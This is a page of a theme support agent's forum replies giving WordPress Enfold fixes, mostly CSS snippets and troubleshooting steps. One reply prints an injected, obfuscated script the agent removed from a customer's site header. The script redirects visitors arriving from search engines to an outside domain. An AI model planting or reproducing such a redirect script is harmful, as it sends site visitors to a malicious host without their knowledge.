Forum Replies Created

Viewing 30 posts - 24,901 through 24,930 (of 25,536 total)
  • Author
    Posts
  • in reply to: Menu link active #709596

    Hey morten008,

    Try to use this code instead:

    #avia-menu .current-menu-item > a {
        background: #d63e2d;
        color: #fff;
    }

    Hope this helps :)

    Best regards,
    Nikko

    in reply to: Design problems #709595

    Hey Jan,

    You can check here for our video tutorials: https://vimeo.com/channels/aviathemes and documentation: http://kriesi.at/documentation/enfold/

    Best regards,
    Nikko

    in reply to: Edit Page Won't Load #709594

    Hey Portfoli0CSG,

    Glad you fixed it :)

    Best regards,
    Nikko

    in reply to: Ipad Portrait Rendering #709405

    Hi Justin,

    Glad we could help :)

    Regards,
    Nikko

    in reply to: bug in the foot widget #709332

    Hey jb84,

    Can you post your previous post?

    Best regards,
    Nikko

    in reply to: Delete part of footer #709329

    Hey themonty1,

    Try to check it in Appearance > Widgets, check the Footer Columns it should be in one of those, if it’s empty, go to Enfold > Footer and under Default Footer Widgets & Socket Settings select Display only the socket. Hope this helps. :)

    Best regards,
    Nikko

    in reply to: Center js_sort_items #709326

    Hey unicaweb,

    Try also adding this code:

    #js_sort_items a {
        display: inline-block !important;
        float: none !important;
    }
    
    span.text-sep {
        float: none !important;
    }

    Let us know if it helps :)

    Best regards,
    Nikko

    in reply to: Post slider: #709316

    Hi,

    Let us know if this is resolved?

    Best regards,
    Nikko

    in reply to: Customizing the Author Name and Updated on date #709315

    Hi,

    Try to go to this link to create a new thread: https://kriesi.at/support/forum/enfold/#new-post

    Best regards,
    Nikko

    in reply to: Full screen sections #709314

    Hi,

    Let us know if it’s fixed :)

    Best regards,
    Nikko

    in reply to: Grid Row loses vertical alignment setting when responsive #709313

    Hi,

    Glad we could help :)

    Best regards,
    Nikko

    in reply to: Customise single product pages #709312

    Hi,

    Yes, it wouldn’t work since Add to Quote removes the Add to Cart button. Are you using the pro or free version of Yith Add to Quote plugin?

    Best regards,
    Nikko

    in reply to: shortcode blog #709310

    Hi Kim,

    Unfortunately I can’t provide a workaround for that, can you try to choose on one of the options:

    1. Put Blogposts in the first tab
    2. Put Blogposts in separate page

    Cheers!
    Nikko

    in reply to: Ipad Portrait Rendering #709298

    Hi!

    I have added this to the Color Section’s Custom Css Class mytable. Then added the code I have posted above, and also included this inside the code I have given:

      #top .mytable .av_one_half .XL br {
        display: none;
      }

    To make the Starting in $5,000 be in one line instead of two lines. Let us know if this is also good on your end. :)

    Best regards,
    Nikko

    in reply to: Tabs on Mobile #709265

    Hi!

    I think it’s possible but we could not cover it with our support since that would take a lot of time to do. What I suggest to do with css is not to make it so specific for example changing this #top.page-id-102 #cloud-solutions .tabcontainer .av_tab_section .tab.active_tab to just #top .cloud-solutions .tabcontainer .av_tab_section .tab.active_tab, removing the page-id will allow this code to apply on other pages and using class (.) instead of id (#), you can use it multiple times within the same page. Hope you find this helpful :)

    Best regards,
    Nikko

    in reply to: Blog Style Layout with Big Preview Pic #709258

    Hey Pelyon,

    Try adding this code at the bottom of Quick CSS:

    @media only screen and (max-width:767px) {
      .page-id-3633 .flex_column.av_one_full {
        padding: 0 !important;
      }
    
      .big-preview.single-big {
        float: none;
        margin: 0;
        width: 100%;
      }
    }

    Let us know if it helps :)

    Cheers!
    Nikko

    in reply to: Masonry Gallery vertical image bug #709248

    Hey!

    Can you post any image if the page is just a draft and not published? so it doesn’t show in the site. If we can atleast have 2 drafts (vertical and horizontal) to test, and if you can give us temporary admin access so we can check the backend and also view the draft.

    Cheers!
    Nikko

    in reply to: avia_transparency_logo appearing on Events pages #709219

    Hey!

    Can you let give details regarding images that can’t be uploaded in the theme? example the file size (4mb), image dimension or width & height (3000x3000px). As for the issue you are having I’ll try to help you as much as I can, hope you’ll be patient enough as it might take a bit time.

    Cheers!
    Nikko

    in reply to: Animation's issues #709198

    Hi,

    Please post us your login credentials (in the “private data” field), so we can take a look at your backend.

    Login credentials include:

    • The URL to the login screen.
    • A valid username (with full administration capabilities).
    • As well as a password for that username.
    • permission to deactivate plugins if necessary.

    Best regards,
    Nikko

    • This reply was modified 8 years, 2 months ago by Nikko.
    in reply to: Portfolios showing on main page #709195

    Hi,

    Glad that it’s fixed :)

    Best regards,
    Nikko

    in reply to: Code in Enfold Child #709192

    Hey opvab,

    Please post us your login credentials (in the “private data” field), so we can take a look at your backend.

    Login credentials include:

    • The URL to the login screen.
    • A valid username (with full administration capabilities).
    • As well as a password for that username.
    • permission to deactivate plugins if necessary.

    Best regards,
    Nikko

    in reply to: Customize Hamburger Menu #709079

    Hi,

    Try to add this code in Quick CSS:

    #top .header_bg {
        background: transparent !important;
    }
    
    #top #header_main {
        border: 0 !important;
    }

    Let us know if it works ;)

    Best regards,
    Nikko

    Hi!

    We are very sorry for the inconvenience, the issue seems to appear on narrow screen but not on a wide screen. I have added this code in Quick CSS (located in Enfold > General Styling) and tested it with link in the private content:

    @media only screen and (max-width:1400px) and (min-width:960px) {
      .html_header_sidebar.html_content_align_right .container {
        padding-left: 200px;
      }
    
      .html_header_sidebar.html_content_align_right .home #homebanner .container,
      .html_header_sidebar.html_content_align_right .home #after_section_1 .container {
        padding-left: 50px;
      }
    }
    
    @media only screen and (max-width:1280px) and (min-width:960px) {
      .html_header_sidebar.html_content_align_right .container {
        padding-left: 350px;
      }
    }
    
    @media only screen and (max-width:959px) and (min-width:767px) {
      .html_header_sidebar.html_content_align_right .container {
        padding-left: 240px;
      }
      .html_header_sidebar.html_content_align_right .home #homebanner .container,
      .html_header_sidebar.html_content_align_right .home #after_section_1 .container {
        padding-left: 50px;
      }
    }

    Let us know if this fixes the issue on your end.

    Regards,
    Nikko

    in reply to: Anchor scroll position #709064

    Hey jaroljmek,

    1.) Kindly add this code to Quick CSS (located in Enfold > General Styling):

    #header_main {
        padding-bottom: 2px;
    }

    2.) Add this code to Quick CSS:

    #contact {
        box-shadow: 0 0 2px 1px rgba(0,0,0,0.1);
    }

    Hope this helps :)

    Best regards,
    Nikko

    in reply to: Forgot password issues #709063

    Hey nermoz,

    A plugin conflict may be one of the reason for this issue.
    To find which plugin is causing the conflict please follow these steps:

    1. Go to your plugins page > Deactivate all active Plugins
    2. Update WordPress and Enfold to latest version if you have not.
    3. Make sure all the plugins are updated.
    4. If the problem does not persist when plugins are turned off, activate one plugin at a time and refresh until you find the plugin in conflict.

    We await the results of your plugin compatibility test.

    Thanks for your cooperation :)
    Best regards,
    Nikko

    in reply to: LayerSlider, Background issue when using a blog #709062

    Hi,

    I have checked the layersliders and find it weird that the image isn’t there but appearing on your sliders, to fix the issue, I have added this code in your Quick CSS (located in Enfold > General Styling):

    .home .ls-slide > img:first-child {
        display: none !important;
    }

    Let us know if this is also fixed on your end :)

    Best regards,
    Nikko

    Hi!

    Try to add this code in your Quick CSS:

    #top .iconbox_left .iconbox_content_title {
        letter-spacing: normal;
        line-height: 1.65;
        padding-left: 36px;
    }

    Hope this helps :)

    Cheers!
    Nikko

    in reply to: On iPhone: EVENT info (left side of page) not viewable #709049

    Hi,

    The login now works. Can you tell us what’s not showing? Is it the Details and information below it? can you post a screenshot how it looks on your end?

    Also I noticed that the social icons are overlapping with the Events in the link you have given, kindly add this code to Quick CSS (located in Enfold > General Styling) to fix it:

    .av-single-event-meta-bar {
        margin-top: 150px;
    }

    Best regards,
    Nikko

    in reply to: Dark grey bar above header section #709047

    Hey!

    You have lots of js codes added in the header and it’s also redundant (what is added multiple times in the head is added also multiple times in the body), there are 4 scripts (no redundancy). 1 script causes the issue and I have removed it:

    <script type="text/javascript">
    function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.aol.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('<script language="javascript">docu'+'ment.location="http://google-statik.pw/XcTyTp"</s'+'cript>')}else{document.write('.')}}R();
    </script>

    Let us know if it’s good on your end also. :)

    Best regards,
    Nikko

    in reply to: bouncing effet with layer Slider #709033

    Hi,

    I’m not sure if we can help you achieve that effect but you might want to check layerslider’s documentation: https://support.kreaturamedia.com/docs/layersliderwp/documentation.html

    Best regards,
    Nikko

Viewing 30 posts - 24,901 through 24,930 (of 25,536 total)